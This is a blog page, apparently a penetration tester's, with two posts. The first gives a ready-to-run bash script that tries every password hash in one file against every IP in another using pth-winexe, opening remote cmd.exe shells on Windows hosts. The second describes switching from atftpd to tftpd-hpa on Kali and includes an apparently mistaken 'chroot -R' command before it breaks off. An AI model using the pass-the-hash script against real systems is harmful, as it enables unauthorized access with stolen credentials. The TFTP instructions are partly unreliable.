Skip to main content

Posts

Showing posts from July, 2018

Pass-The-Hash BruteForcer

Here's a simple script to try a list of hashes out against a list of IPs:

#!/bin/bash
# This pass the hashes in a file of IPs (passed as the FIRST parameter)
# and test every hash in a file of hashes (passed as the SECOND parameter)
# i.e. root#PassTheHashBruteForcer.sh FileOfIPs.txt FileOfHashes.txt

echo "syntax is: "
echo "root#PassTheHashBruteForcer.sh FileOfIPs.txt FileOfHashes.txt"

while read -r line1
do
    while IFS='' read -r line2 || [[ -n "$line2" ]]; do
#echo "$line1 $line2"
echo "/usr/bin/pth-winexe -U $line2 //$line1 cmd.exe"
/usr/bin/pth-winexe -U $line2 //$line1 cmd.exe
#pth-winexe -U $line //10.11.1.$line1 cmd.exe
        #echo "Text read from file: $line"
    done < "$2"
done < "$1"

atftpd vs tftpd-hpa

Recently I was trying to tftp files from a Windows computer to a Kali box.   One version of Windows worked, but another didn't.    After much troubleshooting, here were my symptoms:

I could tftp a file from-to any Kali box from-to another Kali box
I could NOT tftp files to a specific Windows 7 box from any Kali box
I could NOT tftp files to a Chrooted-Ubuntu-Chromebook box from a Kali box

After MUCH troubleshooting, going through every setting in atftpd, it seemed like it literally was a client OS problem.  Different clients simply would not download files---unacceptable.

Thus, I switched to tftpd-hpa.   To install:
apt-get install tftpd-hpa

files go to/come from /srv/tftp, but it needs to be a tftp user. Thus, I needed to:
chroot -R /srv/tftp

Also, if you want to be able to put files ON the tftp server (from a client), you need to modify /etc/default/tftpd-hpa:
change "TFTP_OPTIONS="--secure" to "TFTP_OPTIONS="--secure --create"

I also changed the IP li…